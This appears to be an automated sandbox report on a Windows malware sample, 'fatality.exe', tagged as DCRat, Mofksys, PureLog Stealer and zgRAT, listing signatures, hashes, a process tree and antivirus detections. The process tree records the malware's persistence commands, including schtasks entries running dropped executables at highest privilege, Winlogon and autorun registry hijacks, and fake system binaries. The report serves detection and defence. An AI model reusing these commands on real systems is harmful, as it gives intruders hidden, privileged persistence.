Windows Analysis Report
fatality.exe

Overview

General Information

Sample name: fatality.exe
Analysis ID: 1590002
MD5: c883ea559bee9a0cb393aa32dcaf5d80
SHA1: 995dfd0d9d504bec628e7d7297962677d8ab32cb
SHA256: bfd1aabb65dfce7b7c5f2d444917baa23fd04d6047e62cd1aaf9cb2a9ca9d3a9
Tags: DCRat, exe, NyashTeam, user-MalHunter3

Detection

CryptOne, DCRat, Mofksys, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
Yara detected Mofksys
Yara detected PureLog Stealer
Yara detected zgRAT
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
PE file has nameless sections
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fatality.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\fatality.exe" MD5: C883EA559BEE9A0CB393AA32DCAF5D80)
    • fatality.exe (PID: 7456 cmdline: c:\users\user\desktop\fatality.exe MD5: A7040B85FC683F088F4C6E5B44052C43)
      • wscript.exe (PID: 7600 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • containerReview.exe (PID: 7868 cmdline: "C:\blockcomSession/containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
            • schtasks.exe (PID: 8072 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • csc.exe (PID: 8152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • schtasks.exe (PID: 4092 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2992 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1732 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2516 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5724 cmdline: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4960 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2696 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 416 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4996 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7244 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7444 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7568 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7460 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\containerReview.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7492 cmdline: schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1880 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • icsys.icn.exe (PID: 7488 cmdline: C:\Windows\Resources\Themes\icsys.icn.exe MD5: D36CC2935AE0E7A5D2936DB589A9B8CC)
      • explorer.exe (PID: 7540 cmdline: c:\windows\resources\themes\explorer.exe MD5: 7E24D6E5185E961528CFBCC6840EBBE9)
        • spoolsv.exe (PID: 7560 cmdline: c:\windows\resources\spoolsv.exe SE MD5: DA56FBDFF5925EFBA1E9942139E2A354)
          • svchost.exe (PID: 7592 cmdline: c:\windows\resources\svchost.exe MD5: 5020DD008EA5092AFC4BBD7961322484)
            • spoolsv.exe (PID: 7644 cmdline: c:\windows\resources\spoolsv.exe PR MD5: DA56FBDFF5925EFBA1E9942139E2A354)
  • explorer.exe (PID: 7752 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 7E24D6E5185E961528CFBCC6840EBBE9)
  • svchost.exe (PID: 5704 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • explorer.exe (PID: 7892 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 7E24D6E5185E961528CFBCC6840EBBE9)
  • DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe (PID: 7656 cmdline: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • Idle.exe (PID: 7232 cmdline: C:\blockcomSession\Idle.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • Idle.exe (PID: 7468 cmdline: C:\blockcomSession\Idle.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • smss.exe (PID: 7480 cmdline: C:\blockcomSession\smss.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • smss.exe (PID: 404 cmdline: C:\blockcomSession\smss.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
Mofksys | | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
Source | Rule | Description | Author | Strings
fatality.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
fatality.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
fatality.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Resources\Themes\icsys.icn.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\Windows\Resources\svchost.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\Windows\Resources\spoolsv.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\Windows\Resources\Themes\explorer.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\blockcomSession\Idle.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.1726064451.0000000000402000.00000080.00000001.01000000.0000000C.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000007.00000000.1722308050.0000000000401000.00000080.00000001.01000000.0000000C.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
00000002.00000002.1733234738.0000000000402000.00000080.00000001.01000000.00000008.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
00000004.00000000.1712734504.0000000000401000.00000080.00000001.01000000.0000000C.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |

Source | Rule | Description | Author | Strings
2.0.icsys.icn.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
0.2.fatality.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
14.2.explorer.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
14.0.explorer.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
4.2.spoolsv.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Resources\Themes\icsys.icn.exe, ProcessId: 7488, TargetFilename: c:\windows\resources\themes\explorer.exe
Source: Process started, Author: David Burkett, @signalblur: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 7560, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7592, ProcessName: svchost.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\resources\themes\explorer.exe, CommandLine: c:\windows\resources\themes\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\explorer.exe, NewProcessName: C:\Windows\Resources\Themes\explorer.exe, OriginalFileName: C:\Windows\Resources\Themes\explorer.exe, ParentCommandLine: C:\Windows\Resources\Themes\icsys.icn.exe, ParentImage: C:\Windows\Resources\Themes\icsys.icn.exe, ParentProcessId: 7488, ParentProcessName: icsys.icn.exe, ProcessCommandLine: c:\windows\resources\themes\explorer.exe, ProcessId: 7540, ProcessName: explorer.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\blockcomSession\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 7868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\blockcomSession\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 7868, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", ProcessId: 8152, ProcessName: csc.exe
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: c:\users\user\desktop\fatality.exe , CommandLine: c:\users\user\desktop\fatality.exe , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\fatality.exe , NewProcessName: C:\Users\user\Desktop\fatality.exe , OriginalFileName: C:\Users\user\Desktop\fatality.exe , ParentCommandLine: "C:\Users\user\Desktop\fatality.exe", ParentImage: C:\Users\user\Desktop\fatality.exe, ParentProcessId: 7440, ParentProcessName: fatality.exe, ProcessCommandLine: c:\users\user\desktop\fatality.exe , ProcessId: 7456, ProcessName: fatality.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f, CommandLine: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f, ProcessId: 7244, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 7560, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7592, ProcessName: svchost.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\users\user\desktop\fatality.exe , ParentImage: C:\Users\user\Desktop\fatality.exe , ParentProcessId: 7456, ParentProcessName: fatality.exe , ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , ProcessId: 7600, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\resources\themes\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\Resources\svchost.exe, ProcessId: 7592, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\blockcomSession\containerReview.exe, ProcessId: 7868, TargetFilename: C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline
Source: Process started, Author: vburov: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 7560, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7592, ProcessName: svchost.exe

Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", ProcessId: 8152, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f, CommandLine: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f, ProcessId: 2516, ProcessName: schtasks.exe
No Suricata rule has matched

AV Detection

Source: fatality.exe, Avira: detected
Source: C:\Windows\Resources\Themes\icsys.icn.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Avira: detection malicious, Label: TR/Spy.Agent.cptjt
Source: C:\Windows\Resources\svchost.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Users\user\Desktop\zRrwKlet.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\blockcomSession\Idle.exe, Avira: detection malicious, Label: TR/Spy.Agent.cptjt
Source: C:\Users\user\AppData\Local\Temp\Q048Q85hCW.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\fatality.exe , Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\SdSCeHzI.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Windows\Resources\Themes\explorer.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\Resources\spoolsv.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, ReversingLabs: Detection: 82%
Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Virustotal: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Virustotal: Detection: 76%
Source: C:\Users\user\Desktop\FJTVnRjh.log, Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\SdSCeHzI.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\SdSCeHzI.log, Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\XWvbHmEw.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\ZKzjsAAu.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\fatality.exe , ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\hEPrrPJe.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\zRrwKlet.log, ReversingLabs: Detection: 50%
Source: C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, ReversingLabs: Detection: 82%
Source: C:\blockcomSession\Idle.exe, ReversingLabs: Detection: 82%
Source: C:\blockcomSession\containerReview.exe, ReversingLabs: Detection: 82%
Source: C:\blockcomSession\smss.exe, ReversingLabs: Detection: 82%
Source: fatality.exe, ReversingLabs: Detection: 97%
Source: C:\Windows\System32\SecurityHealthSystray.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\icsys.icn.exe, Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\svchost.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\hEPrrPJe.log, Joe Sandbox ML: detected
Source: C:\blockcomSession\Idle.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fatality.exe , Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SdSCeHzI.log, Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\explorer.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FJTVnRjh.log, Joe Sandbox ML: detected
Source: C:\Windows\Resources\spoolsv.exe, Joe Sandbox ML: detected
Source: fatality.exe, Joe Sandbox ML: detected
